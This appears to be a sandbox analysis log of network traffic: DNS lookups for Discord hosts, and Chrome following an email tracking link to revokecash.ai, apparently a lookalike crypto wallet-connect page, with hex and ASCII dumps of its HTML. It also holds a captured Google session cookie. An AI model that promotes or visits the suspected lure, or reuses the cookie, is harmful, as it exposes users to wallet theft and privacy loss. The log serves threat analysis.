                                                                          Dec 10, 2023 17:45:05.918764114 CET1.1.1.1192.168.2.50xfa16No error (0)discord.gg162.159.135.234A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:05.922091007 CET1.1.1.1192.168.2.50xc17bNo error (0)discord.gg65IN (0x0001)false
                                                                          Dec 10, 2023 17:45:06.617240906 CET1.1.1.1192.168.2.50xc9edNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:06.617240906 CET1.1.1.1192.168.2.50xc9edNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:06.617240906 CET1.1.1.1192.168.2.50xc9edNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:06.617240906 CET1.1.1.1192.168.2.50xc9edNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:06.617240906 CET1.1.1.1192.168.2.50xc9edNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:06.618290901 CET1.1.1.1192.168.2.50xaabdNo error (0)discord.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:45:21.577857971 CET1.1.1.1192.168.2.50xa73cNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:21.577857971 CET1.1.1.1192.168.2.50xa73cNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:21.577857971 CET1.1.1.1192.168.2.50xa73cNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:21.577857971 CET1.1.1.1192.168.2.50xa73cNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:21.577857971 CET1.1.1.1192.168.2.50xa73cNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:21.577873945 CET1.1.1.1192.168.2.50xf6edNo error (0)discord.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:45:25.451894999 CET1.1.1.1192.168.2.50x6babNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:25.451894999 CET1.1.1.1192.168.2.50x6babNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:25.451894999 CET1.1.1.1192.168.2.50x6babNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:25.451894999 CET1.1.1.1192.168.2.50x6babNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:25.451894999 CET1.1.1.1192.168.2.50x6babNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:25.452733040 CET1.1.1.1192.168.2.50xcf90No error (0)cdn.discordapp.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:45:26.167114973 CET1.1.1.1192.168.2.50x2a03No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:26.167114973 CET1.1.1.1192.168.2.50x2a03No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:26.167114973 CET1.1.1.1192.168.2.50x2a03No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:26.167114973 CET1.1.1.1192.168.2.50x2a03No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:26.167114973 CET1.1.1.1192.168.2.50x2a03No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:26.168064117 CET1.1.1.1192.168.2.50x27bbNo error (0)cdn.discordapp.com65IN (0x0001)false
                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.549706192.178.50.454435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:11 UTC680OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                                          Host: accounts.google.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 1
                                                                          Origin: https://www.google.com
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: empty
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4
                                                                          2023-12-10 16:44:11 UTC1OUTData Raw: 20
                                                                          Data Ascii:
                                                                          2023-12-10 16:44:12 UTC1627INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74 72 75 65 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 50 72
                                                                          Data Ascii: HTTP/1.1 200 OKContent-Type: application/json; charset=utf-8Access-Control-Allow-Origin: https://www.google.comAccess-Control-Allow-Credentials: trueX-Content-Type-Options: nosniffCache-Control: no-cache, no-store, max-age=0, must-revalidatePr
                                                                          2023-12-10 16:44:12 UTC23INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                                          Data Ascii: 11["gaia.l.a.r",[]]
                                                                          2023-12-10 16:44:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.549705192.178.50.464435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:11 UTC752OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                                          Host: clients2.google.com
                                                                          Connection: keep-alive
                                                                          X-Goog-Update-Interactivity: fg
                                                                          X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                                                                          X-Goog-Update-Updater: chromecrx-117.0.5938.132
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: empty
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:12 UTC732INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 73 63 72 69 70 74 2d 73 72 63 20 27 72 65 70 6f 72 74 2d 73 61 6d 70 6c 65 27 20 27 6e 6f 6e 63 65 2d 35 62 55 6b 37 51 47 6d 32 4d 2d 57 4e 34 6d 70 42 38 42 71 30 41 27 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 73 74 72 69 63 74 2d 64 79 6e 61 6d 69 63 27 20 68 74 74 70 73 3a 20 68 74 74 70 3a 3b 6f 62 6a 65 63 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 72 65 70 6f 72 74 2d 75 72 69 20 68 74 74 70 73 3a 2f 2f 63 73 70 2e 77 69 74 68 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 73 70 2f 63 6c 69 65 6e 74 75 70 64 61 74 65 2d 61 75 73 2f 31 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c
                                                                          Data Ascii: HTTP/1.1 200 OKContent-Security-Policy: script-src 'report-sample' 'nonce-5bUk7QGm2M-WN4mpB8Bq0A' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1Cache-Control
                                                                          2023-12-10 16:44:12 UTC520INData Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 36 31 38 37 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 33 31 34 35 32 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                                          Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6187" elapsed_seconds="31452"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                                          2023-12-10 16:44:12 UTC200INData Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a
                                                                          Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
                                                                          2023-12-10 16:44:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.54970918.66.255.334435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:13 UTC689OUTGET /l/01HHA7T34SH51AXCSV6CC50V39_2 HTTP/1.1
                                                                          Host: ctrk.klclick.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-User: ?1
                                                                          Sec-Fetch-Dest: document
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:13 UTC631INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 32 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 31 33 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 72 65 76 6f 6b 65 63 61 73 68 2e 61 69 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 4d 4d 4c 45 46 49 4e 41 4c 32 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 65 6d 61 69 6c 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 45 6d 61 69 6c 25 32 30 43 61 6d 70 61 69 67 6e 25 32 30 2d 25 32
                                                                          Data Ascii: HTTP/1.1 301 Moved PermanentlyContent-Type: text/html; charset=utf-8Content-Length: 323Connection: closeDate: Sun, 10 Dec 2023 16:44:13 GMTLocation: https://revokecash.ai?utm_source=MMLEFINAL2&utm_medium=email&utm_campaign=Email%20Campaign%20-%2
                                                                          2023-12-10 16:44:13 UTC323INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 76 6f 6b 65 63 61 73 68 2e 61 69 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 4d 4d 4c 45 46 49 4e 41 4c 32 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 65 6d 61 69 6c 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 45 6d 61 69 6c 25 32 30 43 61 6d 70 61 69 67 6e 25 32 30 2d 25 32 30 44 65 63 25 32 30 31 30 25 32 30 32 30 32 33 25 32 30 31 25 33 41 31 39 25 32 30 50 4d 25 32 30 25 32 38 30 31 48 48 41 37 43 47 36 52 35 45 32 58 59 44 33 4b 5a 36 4a 41 56 4e 38 53 25 32 39 26 61 6d 70 3b 6e 62 5f 6b 6c 69 64 3d 30 31 48 48 41 35 59 48 30 42 4b 39 57 57 33 52 35 41 38 45 5a 52 45 42 37 48 26 61 6d 70 3b 5f 6b 78 3d 66 77 32 77 51 75 30 50 54 39 63 37 61 57 50 35 49 73 65 59 57 56 41 70 6a 43 33 41 6f
                                                                          Data Ascii: <a href="https://revokecash.ai?utm_source=MMLEFINAL2&amp;utm_medium=email&amp;utm_campaign=Email%20Campaign%20-%20Dec%2010%202023%201%3A19%20PM%20%2801HHA7CG6R5E2XYD3KZ6JAVN8S%29&amp;nb_klid=01HHA5YH0BK9WW3R5A8EZREB7H&amp;_kx=fw2wQu0PT9c7aWP5IseYWVApjC3Ao


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.549712104.21.1.2284435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:14 UTC907OUTGET /?utm_source=MMLEFINAL2&utm_medium=email&utm_campaign=Email%20Campaign%20-%20Dec%2010%202023%201%3A19%20PM%20%2801HHA7CG6R5E2XYD3KZ6JAVN8S%29&nb_klid=01HHA5YH0BK9WW3R5A8EZREB7H&_kx=fw2wQu0PT9c7aWP5IseYWVApjC3AozR_83oxjnwCi-bRLwV3NMDiPj-cT-Od8Ka9.HaDCVL HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-User: ?1
                                                                          Sec-Fetch-Dest: document
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:15 UTC695INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 31 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 31 3a
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: ExpressAccept-Ranges: bytesCache-Control: public, max-age=0Last-Modified: Sun, 10 Dec 2023 11:
                                                                          2023-12-10 16:44:15 UTC674INData Raw: 33 37 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 64 61 72 6b 22 20 73 74 79 6c 65 3d 22 2d 2d 77 63 6d 2d 63 6f 6c 6f 72 2d 66 67 2d 31 3a 20 72 67 62 28 32 32 38 2c 32 33 31 2c 32 33 31 29 3b 20 2d 2d 77 63 6d 2d 63 6f 6c 6f 72 2d 66 67 2d 32 3a 20 72 67 62 28 31 34 38 2c 31 35 38 2c 31 35 38 29 3b 20 2d 2d 77 63 6d 2d 63 6f 6c 6f 72 2d 66 67 2d 33 3a 20 72 67 62 28 31 31 30 2c 31 31 39 2c 31 31 39 29 3b 20 2d 2d 77 63 6d 2d 63 6f 6c 6f 72 2d 62 67 2d 31 3a 20 72 67 62 28 32 30 2c 32 30 2c 32 30 29 3b 20 2d 2d 77 63 6d 2d 63 6f 6c 6f 72 2d 62 67 2d 32 3a 20 72 67 62 28 33 39 2c 34 32 2c 34 32 29 3b 20 2d 2d 77 63 6d 2d 63 6f 6c 6f 72 2d 62 67 2d 33 3a 20 72 67 62 28 35
                                                                          Data Ascii: 3708<!DOCTYPE html><html lang="en" class="dark" style="--wcm-color-fg-1: rgb(228,231,231); --wcm-color-fg-2: rgb(148,158,158); --wcm-color-fg-3: rgb(110,119,119); --wcm-color-bg-1: rgb(20,20,20); --wcm-color-bg-2: rgb(39,42,42); --wcm-color-bg-3: rgb(5
                                                                          2023-12-10 16:44:15 UTC1369INData Raw: 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 70 78 3b 20 2d 2d 77 63 6d 2d 6e 6f 74 69 66 69 63 61 74 69 6f 6e 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 33 36 70 78 3b 20 2d 2d 77 63 6d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 32 38 70 78 3b 20 2d 2d 77 63 6d 2d 69 63 6f 6e 2d 62 75 74 74 6f 6e 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 2d 2d 77 63 6d 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 68 69 67 68 6c 69 67 68 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 70 78 3b 20 2d 2d 77 63 6d 2d 74 65 78 74 2d 62 69 67 2d 62 6f 6c 64 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 2d 2d 77 63 6d 2d 74 65 78 74 2d 62 69 67 2d 62 6f 6c 64 2d 77 65 69 67 68 74 3a 20 36 30 30 3b
                                                                          Data Ascii: rder-radius: 10px; --wcm-notification-border-radius: 36px; --wcm-secondary-button-border-radius: 28px; --wcm-icon-button-border-radius: 50%; --wcm-button-hover-highlight-border-radius: 10px; --wcm-text-big-bold-size: 20px; --wcm-text-big-bold-weight: 600;
                                                                          2023-12-10 16:44:15 UTC1369INData Raw: 2d 72 65 67 75 6c 61 72 2d 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 33 65 6d 3b 20 2d 2d 77 63 6d 2d 74 65 78 74 2d 6d 65 64 69 75 6d 2d 72 65 67 75 6c 61 72 2d 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 6e 6f 6e 65 3b 20 2d 2d 77 63 6d 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 27 53 65 67 6f 65 20 55 49 27 2c 20 52 6f 62 6f 74 6f 2c 20 55 62 75 6e 74 75 2c 20 27 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 2d 2d 77 63 6d 2d 66 6f 6e 74 2d 66 65 61 74 75 72 65 2d 73 65 74 74 69 6e 67 73 3a 20 27 74 6e 75 6d 27 20 6f 6e 2c 20 27 6c 6e 75 6d 27 20 6f 6e 2c
                                                                          Data Ascii: -regular-letter-spacing: -0.03em; --wcm-text-medium-regular-text-transform: none; --wcm-font-family: -apple-system, system-ui, BlinkMacSystemFont, 'Segoe UI', Roboto, Ubuntu, 'Helvetica Neue', sans-serif; --wcm-font-feature-settings: 'tnum' on, 'lnum' on,
                                                                          2023-12-10 16:44:15 UTC1369INData Raw: 61 75 74 6f 20 6d 69 6e 2d 68 2d 73 63 72 65 65 6e 22 3e 0a 09 09 09 09 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 20 72 65 6c 61 74 69 76 65 20 70 2d 34 20 6c 67 3a 70 78 2d 38 20 67 61 70 2d 34 20 6d 62 2d 34 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 62 65 74 77 65 65 6e 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 38 22 3e 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 20 6c 67 3a 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 73 74 61 72 74 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 34 20 77 2d 32 2f 35 20 66 6c 65 78 2d 77 72 61 70 22 3e 0a 09 09 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 66 6f 63
                                                                          Data Ascii: auto min-h-screen"><header class="flex flex-col relative p-4 lg:px-8 gap-4 mb-4"><div class="flex justify-between items-center gap-8"><div class="hidden lg:flex justify-start items-center gap-4 w-2/5 flex-wrap"><button class="foc
                                                                          2023-12-10 16:44:15 UTC1369INData Raw: 31 35 30 20 63 75 72 73 6f 72 2d 70 6f 69 6e 74 65 72 20 64 69 73 61 62 6c 65 64 3a 63 75 72 73 6f 72 2d 6e 6f 74 2d 61 6c 6c 6f 77 65 64 20 66 6f 6e 74 2d 6d 65 64 69 75 6d 20 77 68 69 74 65 73 70 61 63 65 2d 6e 6f 77 72 61 70 20 74 65 78 74 2d 62 6c 61 63 6b 20 76 69 73 69 74 65 64 3a 74 65 78 74 2d 62 6c 61 63 6b 20 64 61 72 6b 3a 74 65 78 74 2d 77 68 69 74 65 20 64 61 72 6b 3a 76 69 73 69 74 65 64 3a 74 65 78 74 2d 77 68 69 74 65 20 64 69 73 61 62 6c 65 64 3a 74 65 78 74 2d 7a 69 6e 63 2d 36 30 30 20 64 61 72 6b 3a 64 69 73 61 62 6c 65 64 3a 74 65 78 74 2d 7a 69 6e 63 2d 34 30 30 20 62 6f 72 64 65 72 2d 6e 6f 6e 65 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 74 65 78 74 2d 6c 67 20 73 68 72 69 6e 6b 2d 30 22 20 6f 6e 43 6c 69 63 6b 3d 22 77 63 2e
                                                                          Data Ascii: 150 cursor-pointer disabled:cursor-not-allowed font-medium whitespace-nowrap text-black visited:text-black dark:text-white dark:visited:text-white disabled:text-zinc-600 dark:disabled:text-zinc-400 border-none justify-center text-lg shrink-0" onClick="wc.
                                                                          2023-12-10 16:44:15 UTC1369INData Raw: 64 65 72 20 62 6f 72 64 65 72 2d 62 6c 61 63 6b 20 64 61 72 6b 3a 62 6f 72 64 65 72 2d 77 68 69 74 65 20 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 20 73 68 72 69 6e 6b 2d 30 20 7a 2d 31 30 20 6d 74 2d 32 20 6d 61 78 2d 68 2d 38 38 20 6f 76 65 72 66 6c 6f 77 2d 78 2d 68 69 64 64 65 6e 20 6f 76 65 72 66 6c 6f 77 2d 79 2d 73 63 72 6f 6c 6c 20 66 6f 63 75 73 3a 6f 75 74 6c 69 6e 65 2d 6e 6f 6e 65 22 20 69 64 3d 22 6d 6f 72 65 4d 65 6e 75 22 20 72 6f 6c 65 3d 22 6d 65 6e 75 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 68 69 64 64 65 6e 3d 22 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 20 64 61 74 61 2d 68 65 61 64 6c 65 73 73 75 69 2d 73 74 61 74 65 3d 22 22 3e 0a 09 09 09 09 09 09 09 09 09 3c 61 20 69 64 3d 22 68 65 61 64 6c 65 73 73 75 69
                                                                          Data Ascii: der border-black dark:border-white flex flex-col shrink-0 z-10 mt-2 max-h-88 overflow-x-hidden overflow-y-scroll focus:outline-none" id="moreMenu" role="menu" tabindex="0" hidden="" style="display:none" data-headlessui-state=""><a id="headlessui
